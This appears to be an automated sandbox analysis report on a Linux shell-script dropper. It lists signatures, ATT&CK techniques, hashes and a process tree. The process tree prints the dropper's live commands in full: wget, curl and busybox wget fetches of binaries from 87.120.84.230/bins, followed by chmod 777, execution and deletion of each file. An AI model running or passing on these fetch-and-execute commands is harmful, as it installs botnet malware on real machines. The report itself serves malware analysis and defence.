1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e

General

Target

1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
Size

10KB
MD5

95086b1594ecb8d1d6f260c45e28a21c
SHA1

21511d843b85530f6b864ac7f71c20f01f1166b8
SHA256

1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e
SHA512

757577fa6a5246c8ffe2cd896cf521257e0d3ccb384b4ebfc254716190bf903f7e3fc20c81237da47e0a2d020a9089e1a892c67f4876f89e6b78e09be3a72233
SSDEEP

96:N+2fK+qBBAtH4hHiRNonwem5y44fvopFA3/tSFppKEh0yiRNonwefO4fvopFbQ3l:r4hHe15y4g00y0J4l

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

747 chmod
799 chmod
805 chmod
811 chmod
787 chmod
674 chmod
690 chmod
736 chmod
769 chmod
831 chmod
837 chmod
711 chmod
793 chmod
817 chmod
823 chmod

pid	process
747	chmod
799	chmod
805	chmod
811	chmod
787	chmod
674	chmod
690	chmod
736	chmod
769	chmod
831	chmod
837	chmod
711	chmod
793	chmod
817	chmod
823	chmod

Executes dropped EXE 15 IoCs

Processes:

sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rlV6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnurLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt9KtuwmIyCu2831WrZTg35YWBSba74CicDwJHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsxmDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5kg7i06MjgHyfbI0rokBoJywO6zaylfwMrfhgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4xGoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEYRoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 30 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 15 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx	curl
File opened for modification	/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2	curl
File opened for modification	/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf	curl
File opened for modification	/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5	curl
File opened for modification	/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl	curl
File opened for modification	/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu	curl
File opened for modification	/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq	curl
File opened for modification	/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt	curl
File opened for modification	/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5	curl
File opened for modification	/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48	curl
File opened for modification	/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw	curl
File opened for modification	/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N	curl
File opened for modification	/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf	curl
File opened for modification	/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x	curl
File opened for modification	/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY	curl

/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
/tmp/1defa97bcc61fa80063c805f11d2bf73e79909cdba0baa2df21f2df1abaa033e.sh
1⤵
PID:643

/bin/rm
/bin/rm bins.sh
2⤵
PID:645

/usr/bin/wget
wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
PID:647

/usr/bin/curl
curl -O http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
PID:673

/bin/chmod
chmod 777 sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
- File and Directory Permissions Modification
PID:674

/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
./sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
- Executes dropped EXE
PID:675

/bin/rm
rm sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
2⤵
PID:676

/usr/bin/wget
wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
PID:677

/usr/bin/curl
curl -O http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:678

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
PID:685

/bin/chmod
chmod 777 V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
- File and Directory Permissions Modification
PID:690

/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
./V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
- Executes dropped EXE
PID:691

/bin/rm
rm V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
2⤵
PID:692

/usr/bin/wget
wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
PID:694

/usr/bin/curl
curl -O http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
PID:706

/bin/chmod
chmod 777 rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
- File and Directory Permissions Modification
PID:711

/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
./rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
- Executes dropped EXE
PID:713

/bin/rm
rm rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
2⤵
PID:714

/usr/bin/wget
wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
PID:715

/usr/bin/curl
curl -O http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:722

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
PID:731

/bin/chmod
chmod 777 kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
- File and Directory Permissions Modification
PID:736

/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
./kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
- Executes dropped EXE
PID:737

/bin/rm
rm kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
2⤵
PID:738

/usr/bin/wget
wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
PID:739

/usr/bin/curl
curl -O http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
PID:744

/bin/chmod
chmod 777 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
- File and Directory Permissions Modification
PID:747

/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
./47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
- Executes dropped EXE
PID:748

/bin/rm
rm 47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
2⤵
PID:750

/usr/bin/wget
wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
PID:751

/usr/bin/curl
curl -O http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
PID:764

/bin/chmod
chmod 777 9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
- File and Directory Permissions Modification
PID:769

/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw
./9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
- Executes dropped EXE
PID:771

/bin/rm
rm 9KtuwmIyCu2831WrZTg35YWBSba74CicDw
2⤵
PID:772

/usr/bin/wget
wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
PID:774

/usr/bin/curl
curl -O http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
PID:786

/bin/chmod
chmod 777 JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
- File and Directory Permissions Modification
PID:787

/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
./JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
- Executes dropped EXE
PID:788

/bin/rm
rm JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
2⤵
PID:789

/usr/bin/wget
wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
PID:790

/usr/bin/curl
curl -O http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:791

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
PID:792

/bin/chmod
chmod 777 mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
- File and Directory Permissions Modification
PID:793

/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
./mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
- Executes dropped EXE
PID:794

/bin/rm
rm mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
2⤵
PID:795

/usr/bin/wget
wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:796

/usr/bin/curl
curl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:797

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:798

/bin/chmod
chmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- File and Directory Permissions Modification
PID:799

/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- Executes dropped EXE
PID:800

/bin/rm
rm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:801

/usr/bin/wget
wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
PID:802

/usr/bin/curl
curl -O http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:803

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
PID:804

/bin/chmod
chmod 777 kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
- File and Directory Permissions Modification
PID:805

/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
./kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
- Executes dropped EXE
PID:806

/bin/rm
rm kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
PID:807

/usr/bin/wget
wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
PID:808

/usr/bin/curl
curl -O http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:809

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
PID:810

/bin/chmod
chmod 777 hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
- File and Directory Permissions Modification
PID:811

/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
./hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
- Executes dropped EXE
PID:812

/bin/rm
rm hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
2⤵
PID:813

/usr/bin/wget
wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
PID:814

/usr/bin/curl
curl -O http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
PID:816

/bin/chmod
chmod 777 GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
- File and Directory Permissions Modification
PID:817

/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
./GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
- Executes dropped EXE
PID:818

/bin/rm
rm GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
2⤵
PID:819

/usr/bin/wget
wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
PID:820

/usr/bin/curl
curl -O http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
PID:822

/bin/chmod
chmod 777 RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
- File and Directory Permissions Modification
PID:823

/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
./RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
- Executes dropped EXE
PID:824

/bin/rm
rm RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
2⤵
PID:825

/usr/bin/wget
wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
PID:826

/usr/bin/curl
curl -O http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:828

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
PID:830

/bin/chmod
chmod 777 gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
- File and Directory Permissions Modification
PID:831

/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
./gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
- Executes dropped EXE
PID:832

/bin/rm
rm gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
2⤵
PID:833

/usr/bin/wget
wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:834

/usr/bin/curl
curl -O http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:836

/bin/chmod
chmod 777 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- File and Directory Permissions Modification
PID:837

/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
./5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
- Executes dropped EXE
PID:838

/bin/rm
rm 5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
2⤵
PID:839

/usr/bin/wget
wget http://87.120.84.230/bins/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
2⤵
PID:840

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
memory/791-1-0xb670f000-0xb6720044-memory.dmp

Download

ioc	pid	process
/tmp/sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl	675	sL1w0uWPV91eOVwMNRqt6y4aenZsuX80rl
/tmp/V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu	691	V6kf4qke2a3etgSAuaRIAgVJVY3DNIOhnu
/tmp/rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48	713	rLQ6ZqMewQeFHLBachNbYF0Qbq0LLgTa48
/tmp/kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq	737	kP9YLbBrmy8NYYZ77HcGynm0VLeJkN4KMq
/tmp/47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt	748	47tJOUyPvgjmnKkFLDRrKfDe6UCmkI4jPt
/tmp/9KtuwmIyCu2831WrZTg35YWBSba74CicDw	771	9KtuwmIyCu2831WrZTg35YWBSba74CicDw
/tmp/JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx	788	JHRJcP4rTn2JJsrmdsdIyL4xKqozNzYvsx
/tmp/mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N	794	mDkPJBMBooUlnQ0ttRh5S4Y333QjG4xy6N
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5	800	5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5
/tmp/kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf	806	kg7i06MjgHyfbI0rokBoJywO6zaylfwMrf
/tmp/hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x	812	hgpncQ9nFpNY9fYWsEltyRNTrKbBhUmG4x
/tmp/GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY	818	GoQ0AIEJkrqVc1r6LQ3oGBtVrSOp5qdWEY
/tmp/RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2	824	RoxS1PQZsIzAQRxvPYANRPLzzMZgp1ZCj2
/tmp/gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf	832	gNhozjJrEjJcJMo5qqGRzGmoVpyxcLQakf
/tmp/5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5	838	5ULQittBiyVuc20xiOOqYHHZKvyjhCBie5

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads